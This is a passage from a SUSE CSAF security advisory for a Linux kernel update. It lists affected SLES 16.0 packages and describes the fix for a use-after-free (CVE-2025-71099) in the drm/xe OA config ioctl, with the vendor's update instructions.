"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71098"
},
{
"cve": "CVE-2025-71099",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71099"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl()\n\nIn xe_oa_add_config_ioctl(), we accessed oa_config-\u003eid after dropping\nmetrics_lock. Since this lock protects the lifetime of oa_config, an\nattacker could guess the id and call xe_oa_remove_config_ioctl() with\nperfect timing, freeing oa_config before we dereference it, leading to\na potential use-after-free.\n\nFix this by caching the id in a local variable while holding the lock.\n\nv2: (Matt A)\n- Dropped mutex_unlock(\u0026oa-\u003emetrics_lock) ordering change from\n xe_oa_remove_config_ioctl()\n\n(cherry picked from commit 28aeaed130e8e587fd1b73b6d66ca41ccc5a1a31)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71099",
"url": "https://www.suse.com/security/cve/CVE-2025-71099"
},
{
"category": "external",
"summary": "SUSE Bug 1256592 for CVE-2025-71099",
"url": "https://bugzilla.suse.com/1256592"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
